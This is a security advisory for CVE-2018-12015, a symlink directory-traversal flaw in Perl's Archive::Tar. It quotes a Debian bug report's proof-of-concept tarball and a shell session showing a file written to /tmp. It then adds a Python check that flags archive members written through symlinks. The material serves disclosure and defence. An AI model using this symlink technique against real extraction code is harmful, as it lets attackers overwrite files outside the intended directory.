Subject: CVE-2018-12015 directory traversal vulnerability
As reported to the Debian BTS[1], Archive-Tar has a symlink-related directory traversal vulnerability:
-----
By default, the Archive::Tar module doesn't allow extracting files
outside the current working directory. However, you can bypass this
secure extraction mode easily by putting a symlink and a regular file
with the same name into the tarball.
I've attached a proof of concept tarball, which makes Archive::Tar create
/tmp/moo, regardless of what the current working directory is:
$ tar -tvvf traversal.tar.gz
lrwxrwxrwx root/root 0 2018-06-05 18:55 moo -> /tmp/moo
-rw-r--r-- root/root 4 2018-06-05 18:55 moo
$ pwd
/home/jwilk
$ ls /tmp/moo
ls: cannot access '/tmp/moo': No such file or directory
$ perl -MArchive::Tar -e 'Archive::Tar->extract_archive("traversal.tar.gz")'
$ ls /tmp/moo
/tmp/moo
-----
The attachment is here: https://bugs.debian.org/cgi-bin/bugreport.cgi?att=1;bug=900834;filename=traversal.tar.gz;msg=3
[1] <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=900834>
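
Added example, not part of the original report and not Archive::Tar code: a pre-extraction check, written with Python's tarfile module rather than Perl, that flags an archive in which a member would be written to or through a symlink created earlier in the same archive. It covers the same-name case in the listing above and generalizes to members nested under a symlinked directory; the function names and the sample archive are constructed for illustration.

```python
import io
import posixpath
import tarfile

# Constructed sample mirroring the listing in the report: (name, link target, data)
SAMPLE = [("moo", "/tmp/moo", b""), ("moo", None, b"moo\n")]


def build_archive(entries):
    """Build an in-memory .tar.gz from (name, linkname or None, data) tuples."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, linkname, data in entries:
            info = tarfile.TarInfo(name)
            if linkname is not None:
                info.type = tarfile.SYMTYPE
                info.linkname = linkname
                tar.addfile(info)
            else:
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


def find_symlink_collisions(fileobj):
    """Return (member, symlink, target) for every member that would be written
    to, or underneath, a symlink created earlier in the same archive."""
    findings = []
    symlinks = {}  # normalized path of each symlink seen so far -> its target
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for member in tar:  # members are listed, never extracted
            path = posixpath.normpath(member.name)
            probe = path
            while probe not in ("", ".", "/"):  # the path, then each parent
                if probe in symlinks:
                    findings.append((member.name, probe, symlinks[probe]))
                    break
                probe = posixpath.dirname(probe)
            if member.issym():
                symlinks[path] = member.linkname
    return findings


if __name__ == "__main__":
    for name, link, target in find_symlink_collisions(build_archive(SAMPLE)):
        print(f"refuse: {name!r} is written via symlink {link!r} -> {target!r}")
```

An empty result means no member path collides with an earlier symlink in that archive; it says nothing about symlinks that already exist in the destination directory.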